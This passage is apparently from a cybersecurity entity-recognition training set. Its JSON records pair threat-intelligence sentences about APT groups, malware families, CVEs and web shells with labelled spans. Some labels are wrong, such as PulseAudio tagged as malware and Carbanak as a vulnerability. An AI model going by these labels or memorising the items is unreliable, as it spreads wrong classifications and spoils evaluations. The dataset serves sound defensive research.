A Microsoft Exchange server is composed of two major components : the frontend , also known as the Client Access Service , and the backend .", "spans": {"ORGANIZATION: Hamas": [[117, 122]], "TOOL: WhiteBear": [[259, 268]], "TOOL: Svchost": [[396, 403]], "TOOL: Microsoft Exchange": [[414, 432]], "TOOL: Client Access Service": [[511, 532]]}, "info": {"id": "cyberner_stix_train_002672", "source": "cyberner_stix_train"}} {"text": "This malicious app , detected by ESET as a variant of Android/Twitoor.A , can ’ t be found on any official Android app store – it probably spreads by SMS or via malicious URLs . Alpha’s early role was fairly simple: engage with individuals , who he chose based on the goods they were selling , and then provide personal shipping addresses back to Omega . We are confident this KillDisk malware was deployed by Lazarus , rather than by another , unrelated attacker .", "spans": {"ORGANIZATION: ESET": [[33, 37]], "MALWARE: Android/Twitoor.A": [[54, 71]], "SYSTEM: Android app store": [[107, 124]], "THREAT_ACTOR: Alpha’s": [[178, 185]], "MALWARE: KillDisk": [[377, 385]], "MALWARE: malware": [[386, 393]], "THREAT_ACTOR: Lazarus": [[410, 417]], "THREAT_ACTOR: attacker": [[455, 463]]}, "info": {"id": "cyberner_stix_train_002673", "source": "cyberner_stix_train"}} {"text": "] comarnani [ . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient . We have observed APT1 intruders log in to their hop point , start the C2 server , wait for incoming connections , and then proceed to give commands to victim systems . 
Since as - a - service or commodity malware can include all types of malware , it can be tough to provide specific advice for detection and prevention .", "spans": {"ORGANIZATION: WildFire": [[39, 47]], "MALWARE: Word document": [[85, 98], [156, 169]], "MALWARE: hello.docx": [[103, 113]], "THREAT_ACTOR: APT1": [[237, 241]], "TOOL: C2": [[290, 292]], "MALWARE: commodity malware": [[414, 431]]}, "info": {"id": "cyberner_stix_train_002674", "source": "cyberner_stix_train"}} {"text": "Of note , we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon .", "spans": {"THREAT_ACTOR: Sofacy": [[33, 39]], "MALWARE: Trojan": [[102, 108]], "MALWARE: Cannon": [[116, 122]]}, "info": {"id": "cyberner_stix_train_002675", "source": "cyberner_stix_train"}} {"text": "PC malware first introduced this technique which is becoming a trend in mobile malware having been adopted by several malware families including Dendroid . These spearphishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting . Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . Instead of using twitter ’s google - analytic account , we used an account we control .", "spans": {"MALWARE: Dendroid": [[145, 153]], "THREAT_ACTOR: CopyPaste": [[413, 422]], "SYSTEM: twitter ’s google - analytic account": [[500, 536]]}, "info": {"id": "cyberner_stix_train_002676", "source": "cyberner_stix_train"}} {"text": "Rotexy then sent information about the smartphone to the C & C , including the phone model , number , name of the mobile network operator , versions of the operating system and IMEI . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL . Working with U.S. 
Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government – commonly known as HARDRAIN .", "spans": {"MALWARE: Rotexy": [[0, 6]], "MALWARE: IOC files": [[198, 207]], "THREAT_ACTOR: HIDDEN COBRA": [[216, 228]], "TOOL: FALLCHILL": [[251, 260]], "ORGANIZATION: U.S. Government": [[276, 291]], "ORGANIZATION: DHS": [[303, 306]], "ORGANIZATION: FBI": [[311, 314]], "MALWARE: Trojan": [[326, 332]], "MALWARE: malware": [[333, 340]], "MALWARE: HARDRAIN": [[406, 414]]}, "info": {"id": "cyberner_stix_train_002677", "source": "cyberner_stix_train"}} {"text": "Throughout this blog post I present my analysis and thought process during this research , but if you would just like a list of the findings , they are over on our Unit42 GitHub .", "spans": {"ORGANIZATION: Unit42": [[164, 170]], "TOOL: GitHub": [[171, 177]]}, "info": {"id": "cyberner_stix_train_002678", "source": "cyberner_stix_train"}} {"text": "Some versions of the Trojan can autonomously retrieve confirmation codes from such SMS and send them to the required number . If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , TG-3390 identify other externally accessible servers and deploy ChinaChopper web shells . Meanwhile , the group uses a wide range of IP addresses as input for scanning activities that are grouped by country , allowing them to attack certain regions or areas within particular periods of the year , as previously observed . This could indicate a lack of coordination across different individuals or operational subteams involved in the attack .", "spans": {"TOOL: OwaAuth web shell": [[133, 150]], "THREAT_ACTOR: TG-3390": [[230, 237]]}, "info": {"id": "cyberner_stix_train_002679", "source": "cyberner_stix_train"}} {"text": "Since they were first identified in January 2-16 , this adversary has consistently targeted large organizations for high ransom demands . 
The new threat actor group was eventually named Silence .", "spans": {}, "info": {"id": "cyberner_stix_train_002680", "source": "cyberner_stix_train"}} {"text": "One of the uses the malware gives to this package is the execution of the command \" dumpsys '' to determine if certain activities are running . In the known spear phishing attacks by the Callisto Group , they employed the \" Scout \" malware tool from the RCS Galileo platform . RIPTIDE and HIGHTIDE differ on several points : executable file location , image base address , the User-Agent within the GET requests , and the format of the URI . During the SolarWinds Compromise , APT29 added their own devices as allowed IDs for active sync using Set - CASMailbox , allowing it to obtain copies of victim mailboxes .", "spans": {"THREAT_ACTOR: Callisto Group": [[187, 201]], "TOOL: Scout": [[224, 229]], "THREAT_ACTOR: Galileo": [[258, 265]], "MALWARE: RIPTIDE": [[277, 284]], "MALWARE: HIGHTIDE": [[289, 297]], "TOOL: URI": [[436, 439]], "THREAT_ACTOR: SolarWinds Compromise": [[453, 474]], "THREAT_ACTOR: APT29": [[477, 482]]}, "info": {"id": "cyberner_stix_train_002681", "source": "cyberner_stix_train"}} {"text": "The following new samples were likely delivered via similar spear phishing campaigns as described in IBM 's research .", "spans": {"ORGANIZATION: IBM": [[101, 104]]}, "info": {"id": "cyberner_stix_train_002682", "source": "cyberner_stix_train"}} {"text": "Its installation in a temporary directory alongside network reconnaissance and enumeration tools likely indicates malicious intent .", "spans": {}, "info": {"id": "cyberner_stix_train_002683", "source": "cyberner_stix_train"}} {"text": "The first table contains 205 devices with some Linux properties ; the second contains the specific memory addresses associated with them that are needed for successful exploitation . 
Attackers relied on Microsoft Equation Editor exploit CVE-2018-0798 to deliver a custom malware that Proofpoint researchers have dubbed Cotx RAT . The group has operated since at least 2012 and has compromised high-profile telecommunications networks .", "spans": {"SYSTEM: Linux": [[47, 52]], "THREAT_ACTOR: Attackers": [[183, 192]], "VULNERABILITY: CVE-2018-0798": [[237, 250]], "ORGANIZATION: high-profile telecommunications networks": [[393, 433]]}, "info": {"id": "cyberner_stix_train_002684", "source": "cyberner_stix_train"}} {"text": "These socially engineered emails contain web links of weaponized documents containing exploits or macros . In the second set they are making use of a dynamic DNS service by .", "spans": {"MALWARE: dynamic DNS service": [[150, 169]]}, "info": {"id": "cyberner_stix_train_002685", "source": "cyberner_stix_train"}} {"text": "This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions , consolidating four previously unrelated clusters of threat actor activity into FireEye’s newest named advanced persistent threat group: APT32 . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed – most likely detections were related to students’ and researchers’ scanning known collected samples and any incidents” remain unconfirmed and unknown .", "spans": {"ORGANIZATION: FireEye’s": [[254, 263]], "THREAT_ACTOR: APT32": [[311, 316]], "THREAT_ACTOR: groups'": [[412, 419]], "ORGANIZATION: Chinese universities": [[432, 452]]}, "info": {"id": "cyberner_stix_train_002686", "source": "cyberner_stix_train"}} {"text": "Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . 
The ShooterAudio module uses PulseAudio to capture audio from the user's microphone .", "spans": {"THREAT_ACTOR: actors": [[50, 56]], "VULNERABILITY: CVE-2019-0604": [[66, 79]], "TOOL: China Chopper webshell": [[125, 147]], "FILEPATH: ShooterAudio module": [[154, 173]], "MALWARE: PulseAudio": [[179, 189]]}, "info": {"id": "cyberner_stix_train_002687", "source": "cyberner_stix_train"}} {"text": "This , together with HammerDuke ’s simplistic backdoor functionality , suggests that it is primarily used by the Dukes group as a secondary backdoor left on CozyDuke victims after CozyDuke performed the initial infection and stole any readily available information from them .", "spans": {"MALWARE: HammerDuke": [[21, 31]], "THREAT_ACTOR: Dukes": [[113, 118]], "MALWARE: CozyDuke": [[157, 165], [180, 188]]}, "info": {"id": "cyberner_stix_train_002688", "source": "cyberner_stix_train"}} {"text": "Immediately after activation , the malware creates a textView element in a new window with the following layout parameters : All these parameters ensure the element is hidden from the user . This malware is capable of accessing device configuration data , downloading additional files , executing commands , modifying the registry , capturing screen shots , and exfiltrating data . APT33 : 99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8 S-SHA2 .NET FTP tool . The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": {"THREAT_ACTOR: APT33": [[382, 387]], "MALWARE: 99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8 S-SHA2 .NET FTP": [[390, 470]]}, "info": {"id": "cyberner_stix_train_002689", "source": "cyberner_stix_train"}} {"text": "We collect all data about your friends and family . Silence 's successful attacks currently have been limited to the CIS and Eastern European countries . 
We have medium confidence that this botnet falls under the FIN7 umbrella . Monitor for newly constructed services / daemons that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"THREAT_ACTOR: FIN7": [[213, 217]]}, "info": {"id": "cyberner_stix_train_002690", "source": "cyberner_stix_train"}} {"text": "Mutex name : 20160509 .", "spans": {}, "info": {"id": "cyberner_stix_train_002691", "source": "cyberner_stix_train"}} {"text": "Their tradecraft is superb , operational security second to none and the extensive usage of ‘ living-off-the-land ’ techniques enables them to easily bypass many security solutions they encounter .", "spans": {}, "info": {"id": "cyberner_stix_train_002692", "source": "cyberner_stix_train"}} {"text": "Attackers create this scenario to persuade users to pay the ransom so they can gain back access to the device . Gorgon Group isn't the first actor group we've witnessed dabble in both nation state level and criminal attacks . idc.load_and_run_plugin None C2 RSA Verification", "spans": {"THREAT_ACTOR: Gorgon Group": [[112, 124]], "THREAT_ACTOR: actor group": [[141, 152]]}, "info": {"id": "cyberner_stix_train_002693", "source": "cyberner_stix_train"}} {"text": "Proofpoint researchers observed one DanaBot affiliate ( Affid 11 ) specifically targeting Canada with \" Canada Post \" themed lures between January 1 and May 1 , 2019 . 
In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers .", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "TOOL: DanaBot": [[36, 43]], "ORGANIZATION: Canada Post": [[104, 115]], "MALWARE: publicly available tools": [[215, 239]], "MALWARE: Mimikatz": [[252, 260]], "MALWARE: Hacktool.Mimikatz": [[263, 280]], "SYSTEM: Windows": [[329, 336]], "VULNERABILITY: CVE-2016-0051": [[374, 387]]}, "info": {"id": "cyberner_stix_train_002694", "source": "cyberner_stix_train"}} {"text": "After identifying compromised credentials and executed commands , CTU researchers shifted focus to determine how the threat actors were obtaining the shell and executing their commands on the compromised host .", "spans": {"ORGANIZATION: CTU": [[66, 69]]}, "info": {"id": "cyberner_stix_train_002695", "source": "cyberner_stix_train"}} {"text": "A few of the CosmicDuke samples we discovered also included components that attempt to exploit either of the publicly known CVE-2010-0232 or CVE-2010- 4398 privilege escalation vulnerabilities .", "spans": {"MALWARE: CosmicDuke": [[13, 23]], "VULNERABILITY: CVE-2010-0232": [[124, 137]], "VULNERABILITY: CVE-2010- 4398": [[141, 155]]}, "info": {"id": "cyberner_stix_train_002696", "source": "cyberner_stix_train"}} {"text": "This exploit file made use of the same shellcode that we have observed Transparent Tribe use across a number of spear phishing incidents . 
This event significantly affected the Russian cybercriminal world as the gang had stolen hundreds of millions of rubles during a few years of activity , and was considered a \" leader \" among cybercriminals .", "spans": {}, "info": {"id": "cyberner_stix_train_002697", "source": "cyberner_stix_train"}} {"text": "The use of Twitter either to initially obtain the address of a C&C server ( or as a backup if no hardcoded primary C&C server responds ) is a feature also found in OnionDuke , CozyDuke , and HammerDuke .", "spans": {"TOOL: Twitter": [[11, 18]], "TOOL: C&C": [[63, 66], [115, 118]], "MALWARE: OnionDuke": [[164, 173]], "MALWARE: CozyDuke": [[176, 184]], "MALWARE: HammerDuke": [[191, 201]]}, "info": {"id": "cyberner_stix_train_002698", "source": "cyberner_stix_train"}} {"text": "Such references would be in line with FrozenCell 's phishing tactics in which they used file names to lure people associated with the political party to open malicious documents . Lazarus was previously known to conduct cyberespionage and cybersabotage activities , such as attacks on Sony Pictures Entertainment with volumes of internal data leaked , and many system harddrives in the company wiped . Elfin targets in the U.S. have included organizations in the engineering , chemical , research , energy consultancy , finance , IT , and healthcare sectors . 
Developed in - house using C++ , the NoEscape ransomware uses a hybrid approach to encryption , combining ChaCha20 and RSA encryption algorithms for file encryption and key protection .", "spans": {"MALWARE: FrozenCell": [[38, 48]], "THREAT_ACTOR: Lazarus": [[180, 187]], "ORGANIZATION: Sony Pictures Entertainment": [[285, 312]], "THREAT_ACTOR: Elfin": [[402, 407]], "TOOL: C++": [[587, 590]], "MALWARE: NoEscape ransomware": [[597, 616]]}, "info": {"id": "cyberner_stix_train_002699", "source": "cyberner_stix_train"}} {"text": "However , since the archive that is downloaded into the device has all the necessary information and the malicious actor has access to the device via SMS , the malicious operator can keep its activity even without the C2 infrastructure . In March 2018 , Trend Micro provided a detailed analysis of another campaign that bore the hallmarks of MuddyWater . Even though we don’t have the decryption key or loader , we have uncovered some interesting artifacts . Those desiring to steal payment card data typically install malware on point of sale systems POS with the intent of stealing magnetic stripe data .", "spans": {"ORGANIZATION: Trend Micro": [[254, 265]], "THREAT_ACTOR: MuddyWater": [[342, 352]]}, "info": {"id": "cyberner_stix_train_002700", "source": "cyberner_stix_train"}} {"text": "If however by that time the Dukes are already operating within the victim ’s network , using an another toolset with different IOCs , then it is reasonable to assume that it will take much longer for the victim organization to notice the infiltration .", "spans": {"THREAT_ACTOR: Dukes": [[28, 33]], "TOOL: IOCs": [[127, 131]]}, "info": {"id": "cyberner_stix_train_002701", "source": "cyberner_stix_train"}} {"text": "When an authorization token is stolen by a hacker , they can use this token to access all the Google services related to the user , including Google Play , Gmail , Google Docs , Google Drive , and Google Photos . 
BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . the callback returns NULL from the mblock_t pointer if the instruction is not a top-level one . Also in 2015 , GReAT identified the Minidionis threat ( known by Kaspersky as CloudLook ) to be another backdoor from the same APT actor – this time using a cloud drive capability to store and download malware onto infected systems using a multi - dropper scheme .", "spans": {"ORGANIZATION: Google": [[94, 100]], "SYSTEM: Google Play": [[142, 153]], "SYSTEM: Gmail": [[156, 161]], "SYSTEM: Google Docs": [[164, 175]], "SYSTEM: Google Drive": [[178, 190]], "SYSTEM: Google Photos": [[197, 210]], "THREAT_ACTOR: BRONZE BUTLER": [[213, 226]], "VULNERABILITY: zero-day vulnerability": [[282, 304]], "TOOL: mblock_t": [[499, 507]], "ORGANIZATION: GReAT": [[575, 580]], "MALWARE: Minidionis": [[596, 606]], "ORGANIZATION: Kaspersky": [[625, 634]], "MALWARE: CloudLook": [[638, 647]], "THREAT_ACTOR: APT actor": [[687, 696]]}, "info": {"id": "cyberner_stix_train_002702", "source": "cyberner_stix_train"}} {"text": "This extra stage is used to prevent automated systems from extracting the self-extracting archive .", "spans": {}, "info": {"id": "cyberner_stix_train_002703", "source": "cyberner_stix_train"}} {"text": "Definition of populateConfigMap , which loads the map with values Correlating the last two steps , one can observe that the malware payload receives the configuration for the following properties : number – The default number to be send to the server ( in case the number is not available from the device ) api – The API key url – The URL to be used in WebView to display on the ransom note The malware saves this configuration to the shared preferences of the app data and then it sets up all the Broadcast Receivers . 
There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group . WinZip version 11.2 and 24.0, and the built-in unzIP S-TOOL tool in Windows , recognized that the attachment SHIPPING_MX00034900_PL_INV_pdf.zip is an invalid . The threat actor first detected towards the end of last year when it attacked at least 87 organizations around the world in two months ' time .", "spans": {"THREAT_ACTOR: APT15": [[572, 577]], "ORGANIZATION: NCC Group": [[624, 633]], "TOOL: WinZip": [[636, 642]], "TOOL: unzIP S-TOOL": [[683, 695]], "SYSTEM: Windows": [[704, 711]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[745, 779]]}, "info": {"id": "cyberner_stix_train_002704", "source": "cyberner_stix_train"}} {"text": "The role of ANDROIDOS_HTBENEWS.A and the malicious APK mentioned in the first method is to exploit a local privilege escalation vulnerability in Android devices . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies . The algorithm looks straightforward however some portions of the code had to be modified in order to correctly deobfuscate the code . But as a new documentary series on Hulu reveals [ SPOILER ALERT ! 
] , there was just one problem with that theory : Their top suspect had killed himself more than a year before the hackers began publishing stolen user data .", "spans": {"MALWARE: ANDROIDOS_HTBENEWS.A": [[12, 32]], "VULNERABILITY: local privilege escalation vulnerability": [[101, 141]], "VULNERABILITY: Carbanak": [[235, 243]], "ORGANIZATION: financial industry": [[260, 278]], "ORGANIZATION: payment providers": [[289, 306]], "ORGANIZATION: retail industry": [[309, 324]], "ORGANIZATION: PR companies": [[329, 341]], "ORGANIZATION: Hulu": [[513, 517]]}, "info": {"id": "cyberner_stix_train_002705", "source": "cyberner_stix_train"}} {"text": "More importantly , one of these files also enables the download of TeamViewer , a remote access tool that gives threat actors remote control over the system . In early 2016 the Callisto Group began sending highly targeted spear phishing emails with malicious attachments that contained , as their final payload , the \" Scout \" malware tool from the HackingTeam RCS Galileo platform .", "spans": {"TOOL: TeamViewer": [[67, 77]], "THREAT_ACTOR: threat actors": [[112, 125]], "TOOL: emails": [[237, 243]], "FILEPATH: malicious attachments": [[249, 270]], "MALWARE: Scout": [[319, 324]]}, "info": {"id": "cyberner_stix_train_002706", "source": "cyberner_stix_train"}} {"text": "In February , we recorded 767 infections . This suggests that due to the January 2017 attack , the targeted organization may have taken actions to counter known OilRig TTPs , in this case delivering malicious macro documents , causing the OilRig operators to adopt a different delivery tactic . The image file is a real image with a base64-encoded binary appended at the end . 
Better yet , reach out to us , and well be pleased to share a customized demonstration of the ThreatConnect Platform .", "spans": {"THREAT_ACTOR: OilRig": [[161, 167], [239, 245]], "THREAT_ACTOR: operators": [[246, 255]], "TOOL: ThreatConnect Platform .": [[471, 495]]}, "info": {"id": "cyberner_stix_train_002707", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //nttdocomo-qat [ . Finally , the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28 's ability and interest in exploiting geopolitical events for their operations . This attack , if successful , can infect a compromised system with both Ursnif malware and GandCrab ransomware . Create NSPPE core dump files on NetScaler ( instructions from vendor ) .", "spans": {"ORGANIZATION: military": [[96, 104]], "THREAT_ACTOR: APT28": [[164, 169]], "ORGANIZATION: geopolitical": [[208, 220]], "MALWARE: Ursnif": [[323, 329]], "MALWARE: GandCrab": [[342, 350]]}, "info": {"id": "cyberner_stix_train_002708", "source": "cyberner_stix_train"}} {"text": "and web applications ) via ws ( WebSockets ) or wss ( WebSockets over SSL/TLS ) to communicate with its C & C servers . More recently , Lazarus has also become involved in financially motivated attacks , including an US$81 million dollar theft from the Bangladesh Central Bank and the WannaCry ransomware . 
analyzed campaigns , such as the “ i.cmd ” and “ exit.exe ” files , and , at the same time , some new components have been introduced , for instance the “ rtegre.exe ” and the “ veter1605_MAPS_10cr0.exe ” file .", "spans": {"THREAT_ACTOR: Lazarus": [[136, 143]], "ORGANIZATION: Bangladesh Central Bank": [[253, 276]], "TOOL: WannaCry": [[285, 293]], "FILEPATH: i.cmd": [[342, 347]], "FILEPATH: exit.exe": [[356, 364]], "FILEPATH: rtegre.exe": [[462, 472]], "FILEPATH: veter1605_MAPS_10cr0.exe": [[485, 509]]}, "info": {"id": "cyberner_stix_train_002709", "source": "cyberner_stix_train"}} {"text": "Intelligence suggests the group has been active since at least 2014 and is presently operating in multiple facilities targeting safety systems beyond Triconex .", "spans": {"TOOL: Triconex": [[150, 158]]}, "info": {"id": "cyberner_stix_train_002710", "source": "cyberner_stix_train"}} {"text": "Earlier this year , the actor used “ .pw ” TLDs while the Bank Austria scheme highlighted above used “ .info ” . In most cases , threat actors typically stop or slow down their activities once their campaigns are publicly revealed . While the group has not been definitively attributed , circumstantial evidence suggests the group may be a pro-Indian or Indian entity .", "spans": {"SYSTEM: Bank Austria": [[58, 70]], "THREAT_ACTOR: threat actors": [[129, 142]]}, "info": {"id": "cyberner_stix_train_002711", "source": "cyberner_stix_train"}} {"text": "The group distributing this family of malware decorates it in the branding and logos of well-known social media or media player apps , system update patches , or ( in its most recent campaign ) VPN client apps in an attempt to lure users into downloading , installing , and elevating the privileges of a Trojanized app hosted on a site not affiliated with any reputable app market or store . APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations . 
KtJvOXulgibfiHk is the password for uploaded zip . Masked Downloads A malware download , and installation , may be masked by renaming a legitimate Windows system framework such as Powershell.exe to hide from monitoring tools .", "spans": {"SYSTEM: VPN": [[194, 197]], "THREAT_ACTOR: APT37": [[392, 397]], "ORGANIZATION: research fellow": [[409, 424]], "ORGANIZATION: advisory member": [[427, 442]], "ORGANIZATION: journalist": [[449, 459]], "ORGANIZATION: strategic organizations": [[523, 546]]}, "info": {"id": "cyberner_stix_train_002712", "source": "cyberner_stix_train"}} {"text": "This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard . The attackers began taking them offline in January 2014 .", "spans": {}, "info": {"id": "cyberner_stix_train_002713", "source": "cyberner_stix_train"}} {"text": "We 've contacted the potentially affected users , disabled the applications on affected devices , and implemented changes in Verify Apps to protect all users . Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address . In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 . This is possibly an indication of compromised login credentials , and it can be verified by further investigating the login attempts and recent activities by the same user .", "spans": {"SYSTEM: Verify Apps": [[125, 136]], "ORGANIZATION: Symantec": [[160, 168]], "THREAT_ACTOR: Leafminer": [[195, 204]], "VULNERABILITY: Heartbleed vulnerability": [[221, 245]], "VULNERABILITY: CVE-2014-0160": [[248, 261]], "ORGANIZATION: Kaspersky Lab": [[321, 334]]}, "info": {"id": "cyberner_stix_train_002714", "source": "cyberner_stix_train"}} {"text": "GolfSpy ’ s infection chain GolfSpy 's Potential Impact Given GolfSpy ’ s information-stealing capabilities , this malware can effectively hijack an infected Android device . 
Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit . In various cases , the operators exchanged numerous messages with their victims for weeks before sending their malicious documents . The cryptographic certificates have also been exploited in attacks that have hit companies in the aerospace industry .", "spans": {"MALWARE: GolfSpy": [[0, 7], [28, 35], [62, 69]], "SYSTEM: Android": [[158, 165]], "VULNERABILITY: 0-day": [[286, 291]], "VULNERABILITY: Adobe Flash Player exploit": [[294, 320]], "SYSTEM: The cryptographic certificates": [[456, 486]], "ORGANIZATION: aerospace industry": [[554, 572]]}, "info": {"id": "cyberner_stix_train_002715", "source": "cyberner_stix_train"}} {"text": "This is a local root exploit pack , and the Trojan uses 4 different exploit pack files , 3 for 32-bit systems and 1 for 64-bit-systems . The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party . Based on the routines used , we estimate that this attack has a global reach . The track controlling commands issued may have also resulted in tram collisions , a further risk to those on board and nearby the areas of impact .", "spans": {"ORGANIZATION: employees": [[168, 177]], "ORGANIZATION: government agencies": [[201, 220]], "ORGANIZATION: security services": [[223, 240]], "ORGANIZATION: students": [[255, 263]], "ORGANIZATION: Fatah political party": [[296, 317]]}, "info": {"id": "cyberner_stix_train_002716", "source": "cyberner_stix_train"}} {"text": "As a result , no new instances of this app can be installed on iOS devices and existing installations can no longer be run . Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . 
Our recent report , \" The Chronicles of the Hellsing APT : the Empire Strikes Back \" began with an introduction to the Naikon APT , describing it as \" One of the most active APTs in Asia , especially around the South China Sea \" .", "spans": {"SYSTEM: iOS": [[63, 66]], "MALWARE: malicious Word documents": [[146, 170]], "VULNERABILITY: Windows OLE Automation Array Remote Code Execution Vulnerability": [[199, 263]], "VULNERABILITY: CVE-2014-6332": [[275, 288]], "THREAT_ACTOR: Hellsing APT": [[335, 347]], "MALWARE: Empire Strikes Back": [[354, 373]], "THREAT_ACTOR: Naikon APT": [[410, 420]]}, "info": {"id": "cyberner_stix_train_002718", "source": "cyberner_stix_train"}} {"text": "pl.millennium.corpApp eu.transfer24.app pl.aliorbank.aib pl.corelogic.mtoken alior.bankingapp.android com.ferratumbank.mobilebank com.swmind.vcc.android.bzwbk_mobile.app de.schildbach.wallet piuk.blockchain.android com.bitcoin.mwallet com.btcontract.wallet com.bitpay.wallet com.bitpay.copay btc.org.freewallet.app org.electrum.electrum Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks . 
Hash : 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a That piece explored how Biderman — who is Jewish — had become the target of concerted harassment campaigns by anti - Semitic and far - right groups online in the months leading up to the hack .", "spans": {"FILEPATH: 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a": [[461, 525]], "ORGANIZATION: Biderman": [[550, 558]], "ORGANIZATION: anti - Semitic and far - right groups": [[636, 673]]}, "info": {"id": "cyberner_stix_train_002719", "source": "cyberner_stix_train"}} {"text": "The attackers first researched desired targets and then sent an email specifically to the target .", "spans": {"TOOL: email": [[64, 69]]}, "info": {"id": "cyberner_stix_train_002720", "source": "cyberner_stix_train"}} {"text": "Computer network defenders can use this information to reduce the time and effort associated with responding to TG-3390 .", "spans": {"THREAT_ACTOR: TG-3390": [[112, 119]]}, "info": {"id": "cyberner_stix_train_002721", "source": "cyberner_stix_train"}} {"text": "Information from a Russian recruitment website , linked to CNIIHM ’s official domain , indicates that CNIIHM is also dedicated to the development of intelligent systems for computer-aided design and control , and the creation of new information technologies .", "spans": {"ORGANIZATION: CNIIHM": [[59, 65], [102, 108]]}, "info": {"id": "cyberner_stix_train_002722", "source": "cyberner_stix_train"}} {"text": "] 230 [ . This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis . The image below depicts the contents of the o402ek2m.php file . 
The Systemd configuration file leveraged by Sandworm enabled the group to maintain persistence on systems .", "spans": {"THREAT_ACTOR: threat actors": [[68, 81]], "FILEPATH: o402ek2m.php": [[238, 250]], "THREAT_ACTOR: Sandworm": [[302, 310]]}, "info": {"id": "cyberner_stix_train_002723", "source": "cyberner_stix_train"}} {"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . However , to our knowledge , this is the first time Turla has used Metasploit as a first stage backdoor , instead of relying on one of its own tools such as Skipper .", "spans": {"MALWARE: Microsoft Word documents": [[64, 88]], "VULNERABILITY: CVE-2017-0199": [[100, 113]], "THREAT_ACTOR: Turla": [[168, 173]], "MALWARE: Metasploit": [[183, 193]], "MALWARE: Skipper": [[273, 280]]}, "info": {"id": "cyberner_stix_train_002724", "source": "cyberner_stix_train"}} {"text": "Don ’ t install apps outside the official app store . The group conducts operations primarily in the Middle East , targeting financial , government , energy , chemical , telecommunications and other industries . The python code is wrapped into an executable using pyinstaller . The commandline parameters m and h are mutually exclusive .", "spans": {"THREAT_ACTOR: group": [[58, 63]], "ORGANIZATION: financial": [[125, 134]], "ORGANIZATION: government": [[137, 147]], "ORGANIZATION: energy": [[150, 156]], "ORGANIZATION: chemical": [[159, 167]], "ORGANIZATION: telecommunications": [[170, 188]], "TOOL: python": [[216, 222]]}, "info": {"id": "cyberner_stix_train_002725", "source": "cyberner_stix_train"}} {"text": "Stage 1 : Exodus One The first stage installed by downloading the malicious apps uploaded on Google Play Store only acts as a dropper . 
While investigating recent attacks performed by the threat actor group OilRig using their new Bondupdater version , Unit 42 researchers searched for additional Microsoft Office documents used by OilRig hoping to locate additional malware being used in other attacks during the same time period . By default , most of the virtual machines do not have a serial number on the disk . Some groups are even exploiting zero - day vulnerabilities , allowing them to cast a wider net of victims .", "spans": {"MALWARE: Exodus One": [[10, 20]], "SYSTEM: Google Play Store": [[93, 110]], "THREAT_ACTOR: threat actor group OilRig": [[188, 213]], "TOOL: Bondupdater": [[230, 241]], "ORGANIZATION: Unit 42": [[252, 259]], "THREAT_ACTOR: OilRig": [[331, 337]], "THREAT_ACTOR: groups": [[521, 527]], "VULNERABILITY: zero - day vulnerabilities": [[548, 574]]}, "info": {"id": "cyberner_stix_train_002726", "source": "cyberner_stix_train"}} {"text": "98.05 % of all malware detected in 2013 targeted this platform , confirming both the popularity of this mobile OS and the vulnerability of its architecture . Usually , the delivered payload is either the well-known ' PlugX ' or ' HTTPBrowser ' RAT , a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups . Samples from both ShadowPad and Winnti found at these universities contain campaign identifiers and C&C URLs with the names of the universities , which indicates a targeted attack . 
